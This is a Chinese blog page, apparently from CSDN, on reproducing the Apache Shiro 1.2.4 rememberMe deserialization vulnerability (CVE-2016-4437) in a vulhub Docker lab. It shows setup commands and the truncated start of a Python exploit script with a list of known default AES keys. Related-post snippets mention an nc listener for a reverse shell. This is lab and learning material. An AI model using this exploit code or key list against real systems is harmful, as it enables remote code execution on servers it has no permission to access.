Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现

最新推荐文章于 2024-09-12 16:00:19 发布
最新推荐文章于 2024-09-12 16:00:19 发布
阅读量945 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandao_ahfengren/article/details/114392184
本文详细介绍了Apache Shiro 1.2.4版本存在的反序列化漏洞(CVE-2016-4437),包括漏洞简介、影响版本、环境搭建步骤、漏洞复现过程,以及针对该问题的修复建议。通过Poc展示了如何加密反弹shell,并提供了解决方案,即升级到安全版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介

 

Apache Shiro是一套用于执行认证、授权、加密和会话管理的Java安全框架。

 

影响版本

 

Apache Shiro < 1.2.5

 

环境搭建

 

这里使用docker来搭建

环境地址

https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437

 

进入目录并启动Apache Shiro 1.2.4的Web服务

cd vulhub-master/shiro/CVE-2016-4437/

docker-compose up -d

访问http://your-ip:8080即可看到页面

 

漏洞复现

 

Poc

#! python2.7
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
import json
import time
import random
import argparse
from Crypto.Cipher import AES

JAR_FILE = 'ysoserial.jar'

CipherKeys = [
    "4AvVhmFLUs0KTA3Kprsdag==",
    "3AvVhmFLUs0KTA3Kprsdag==",
    "2AvVhdsgUs0FSA3SDFAdag==",
    "6ZmI6I2j5Y+R5aSn5ZOlAA==",
    "wGiHplamyXlVB11UXWol8g==",
    "cmVtZW1iZXJNZQAAAAAAAA==",
    "Z3VucwAAAAAAAAAAAAAAAA==",
    "ZnJlc2h6Y24xMjM0NTY3OA==",
    "L7RioUULEFhRyxM7a2R/Yg==",
    "RVZBTk5JR0hUTFlfV0FPVQ==",
    "fCq+/xW488hMTCD+cmJ3aQ==",
    "WkhBTkdYSUFPSEVJX
最低0.47元/天 解锁文章

200万优质内容无限畅学
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 2045
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437复现
yukinorong的博客
06-29 3422
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3042
CVE-2016-4437 Shiro反序列化漏洞复现
vulhub漏洞复现 Apache Shiro 1.2.4反序列化漏洞
m0_56135391的博客
04-16 3042
使用docker -compose up -d拉取环境 本地访问8080端口进行验证,创建成功 使用shiro反序列化漏洞利用工具进行漏洞利用,输入目标网址,点击下一步 选择使用ceye.lo进行漏洞检测 当命令可输入的时候,证明含有该漏洞 在命令行中输入id,显示命令执行成功,但无回显 输入命令touch test创建一个文件 在网站目录下查看,该文件创建成功 打开虚拟机Kali系统,输入命令 nc -nvlp 6666监听6666端口 在shiro反序列化利用工具中选择简便操作,反
Apache Shiro 1.2.4 反序列化漏洞CVE-2016-4437
weixin_41182861的博客
09-25 460
漏洞简述 Apache shiro默认使用了CookieRememberMeManager,其处理cookie的流程是: #mermaid-svg-xo52XeHokgXokDcR .label{font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family);fill:#333;color:#333}#mermaid-svg-xo52XeHokgXokDcR .label text{fill:#333}#
shiro反序列化漏洞复现CVE-2016-4437
wangzhifei1的博客
01-19 2495
Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞
Shiro-CVE-2016-4437 漏洞复现(vulhub靶场搭建)
zzxyccxc的博客
09-12 1450
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
漏洞复现(五):Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
weixin_47306547的博客
01-03 3140
漏洞原理 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 漏洞复现 环境搭建 cd vulhub/shiro/CVE-2016-4437/ docker-compose up -d 漏洞利用 工具:https://github.com/feihong-cs/ShiroExploit/relea.
(CVE-2016-4437) Apache Shiro 反序列化漏洞 复现
m0_58687645的博客
02-08 3283
一、漏洞描述 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。 二、漏洞影响 只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。 三、环境搭建 cd CVE-2016-4437/ docker-compose up -d 四、漏洞复现 访问靶机ip 使用工具进行半自动化注入检测 shell成功写入,使用冰蝎.
shiro反序列化漏洞复现CVE-2016-4437
m0_70349048的博客
05-19 784
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
shiro反序列化漏洞修复(使用随机密钥)
m0_67391121的博客
08-24 1364
说明:shiro低版本使用固定默认密钥,有被攻击的风险,可以升级shiro版本,Apache官方已在1.2.5及以上版本中修复此漏洞,但是此方式有依赖冲突的风险。这里说说不升级版本的解决方案,这方案和官方的方案一样,都是使用生成的随机密钥。2、配置shiro安全管理器,使用密钥生成工具生成的随机密钥。1、创建随机生成密钥工具。
200shiro_key
weixin_46137328的博客
03-18 4318
0AvVhmFLUs0KTA3Kprsdag== 1AvVhdsgUs0FSA3SDFAdag== 1QWLxg+NYmxraMoxAXu/Iw== 1tC/xrDYs8ey+sa3emt...
Shiro1.2.4发序列化漏洞
课嗨教育的专栏
04-02 389
漏洞描述 ​ Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 ​ Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 漏洞产生原因: ​ shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到r
登陆页面渗透测试常见的几种思路与总结
weixin_50464560的博客
10-02 4385
前言 我们在进行渗透测试的时候,常常会遇到许多网站站点,而有的网站仅仅是基于一个登陆接口进行处理的。尤其是在内网环境的渗透测试中,客户常常丢给你一个登陆网站页面,没有测试账号,让你自己进行渗透测试,一开始经验不足的话,可能会无从下手。今天就来简单说一下如何在只有一个登陆页面的情况下,来进行渗透测试。 0x00 在条件允许的情况下,我们可以拿在渗透测试的开始之前拿出我们的扫描器来进行扫描,目前我们最常用的就是AWVS和Nessus,除此之外,我们还可以使用一些别的自动化测试...
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
qq_51163834的博客
06-05 2343
Apache Shiro框架提供了记住密码的功能,用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>BASE64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务器收到请求对RememberMe值,先进行base64解码然后AES解密在反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
热门推荐
渗透之路,攻防之间皆学问
03-28 1万+
Shiro 1.2.4 反序列化漏洞
Docker环境下复现Shiro反序列化漏洞CVE-2016-4437
最新发布
08-03
</think>### Docker搭建Apache Shiro反序列化漏洞环境(CVE-2016-4437) #### 环境搭建步骤: 1. **拉取漏洞镜像** 使用官方漏洞测试镜像(需提前安装Docker): ```bash docker pull medicean/vulapps:s_shiro...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值